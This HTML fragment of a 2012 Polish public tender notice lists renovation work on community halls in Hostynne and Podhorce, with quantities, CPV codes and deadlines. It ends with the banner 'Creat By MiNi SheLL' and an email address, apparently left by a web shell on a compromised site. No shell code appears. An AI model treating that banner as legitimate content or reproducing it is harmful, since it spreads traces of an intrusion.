<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont    budynku świetlicy w  miejscowości   Hostynne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Roboty  rozbiórkowe 
a) Rozebranie  pokrycia  dachowego z  płyt azbestowo -  cementowych falistych - 198,70 m 2;
b) Rozebranie  sufitu  podwieszanego z płyt pilśniowych  twardych kasetonowych  - 118,93 m  2;
2. Roboty  remontowe 
a) Docieplenie ścian zewnętrznych cokołu - 20,20 m 2 ;
b) Docieplenie ścian zewnętrznych  budynku   styropianem  twardym  grubości 15  cm  z wyprawa  elewacyjną  i malowaniem - 178,35 m 2;
c)Pokrycie  dachów  połaci blachą  ocynkowana  trapezową - 239,68 m 2 ;
d) Pełnie  obróbki  blacharskie ;
e) Wymiana  stolarki okiennej i drzwiowej ;
f)  Wymiana  części  podłogi  z desek struganych grubości 32 mm - 59,47 m 2;
g) Wykonanie posadzki z  płytek  terakotowych  - 41,82 m 2;
h)Wykonanie  sufitów  podwieszanych  o konstrukcji metalowej  z wypełnieniem płytami gipsowo - kartonowymi - 160,75 m 2;
i)Malowanie  farbami  emulsyjnymi  - 161,16 m 2 ;
j) Oczyszczenie  i malowanie  boazerii drewnianej  lakierem bezbarwnym - 61,88 m 2;
k) Wykonanie  opaski  betonowej wokół  budynku - 21,0 m 2;
l)Wykonanie  opaski odwadniającej  z kostki  brukowej betonowej - 30,00 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.44.30.00-4, 45.26.12.10-9, 45.42.11.00-5, 45.43.21.00-5, 45.44.21.00-8, 45.42.11.46-9, 45.23.24.51-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont    budynku świetlicy- remizy  w  miejscowości   Podhorce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Wymiana  stolarki  okiennej i  drzwiowej ;
2. Rozebranie  sufity  podwieszanego  z płyt  pilśniowych twardych -114,75 m 2;
3. Rozebranie  pokrycia  dachowego  z  blachy 335,0 m 2;
4.Docieplenie  ścian  zewnętrznych  budynku styropianem  grubości 15  cm wraz z  wyprawą  elewacyjną   - 117,49 m 2 ;
5. Docieplenie ścian zewnętrznych budynku  styropianem grubości 10  cm  z  wyprawa elewacyjną -101,05 m 2;
6.Malowanie  elewacji zewnętrznych  budynku- 224,54 m 2 ;
7.Pokrycie  dachów  blachą ocynkowana  powlekaną- 375,67  m 2 ;
8. Pełnie  obróbki  blacharskie ;
9. Wykonanie  posadzek z  płytek  terakotowych  20 x 25  cm - 84,31 m 2 ;
Sufity  podwieszane  o  konstrukcji  metalowej z  wypełnieniem płytami gipsowo - kartonowymi  - 260,30  m 2 ;
10. Wykonanie  opaski odwadniającej z  kostki  brukowej betonowej - 65,60 m 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.44.30.00-4, 45.26.12.10-9, 45.42.11.00-5, 45.43.21.00-5, 45.44.21.00-8, 45.42.11.46-9, 45.23.24.51-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com